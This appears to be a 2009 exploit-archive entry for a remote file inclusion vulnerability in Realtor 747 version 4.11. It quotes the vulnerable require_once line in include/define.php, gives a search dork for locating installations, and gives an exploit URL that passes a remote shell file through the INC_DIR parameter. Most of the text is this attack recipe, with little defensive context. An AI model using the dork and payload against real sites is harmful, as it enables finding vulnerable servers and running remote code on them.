[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability
# Published : 2009-01-12
# Author : ahmadbady
# Previous Title : dMx READY ( 25 Products ) Remote Database Disclosure Vulnerability
# Next Title : Joomla com_xevidmegahd (catid) Remote SQL Injection Exploit
-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:realtor747 Version 4.11
------------------------------------------------------------------
download from:http://www.it747.com/realtor747/intro/trial/realtor747-v4-11-trial.zip
------------------------------------------------------------------
.......................................................
vul:/include/define.php line 51:
require_once( "$INC_DIR/define_area.php" );
------------------------------------------------------
dork:"REALTOR 747 - Version 4.11"
-----------------------------------------------------
xpl:
http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------
# www.Syue.com [2009-01-12]